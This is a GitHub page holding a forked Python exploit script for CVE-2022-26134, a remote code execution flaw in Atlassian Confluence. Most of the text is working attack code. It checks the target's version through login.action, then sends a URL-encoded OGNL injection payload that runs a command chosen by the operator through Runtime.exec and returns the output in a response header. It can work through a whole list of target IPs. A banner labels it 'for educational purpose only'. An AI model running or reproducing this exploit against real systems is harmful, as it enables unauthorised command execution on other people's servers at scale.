forked from abhishekmorla/CVE-2022-26134
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2022-26134.py
85 lines (62 loc) · 2.46 KB
/
CVE-2022-26134.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
from bs4 import BeautifulSoup
import requests
import urllib3
import re
import sys
urllib3.disable_warnings()
def banner():
CVE_2022_26134Logo = """
_______ ________
/ ____/ | / / ____/
/ / | | / / __/
/ /___ | |/ / /___
\____/ |___/_____/___ ___ _____________ __ __
|__ \ / __ \__ \|__ \ |__ \ / ___< /__ // // /
__/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
/ __// /_/ / __// __/_____/ __// /_/ / /___/ /__ __/
/____/\____/____/____/ /____/\____/_//____/ /_/
FOR EDUCATIONAL PURPOSE ONLY.
Execute command if ip is vulnerable
"""
return print('\033[1;94m{}\033[1;m'.format(CVE_2022_26134Logo))
def check_target_version(host):
try:
response = requests.get("{}/login.action".format(host), verify=False, timeout=8)
if response.status_code == 200:
filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)
if len(filter_version) >= 1:
version = filter_version[0].split("'>")[1].split('</')[0]
return version
else:
return 0
else:
return host
except:
return False
def send_payload(host, command):
payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)
response = requests.get("{}/{}/".format(host, payload), verify=False, allow_redirects=False)
try:
if response.status_code == 302:
return response.headers["X-Cmd-Response"]
else:
return "0"
except:
return "0"
def main():
banner()
if len(sys.argv) < 3:
print("\033[1;94mHow to use:\033[1;m")
print("ex: python3 {} list_of_ip id".format(sys.argv[0]))
return
target = sys.argv[1]
cmd = sys.argv[2]
for ip in open(target, "r"):
try:
exec_payload = send_payload(ip.strip(), cmd)
if exec_payload != "0":
print("IP: " + ip.strip() + " " + exec_payload)
except:
pass
if __name__ == "__main__":
main()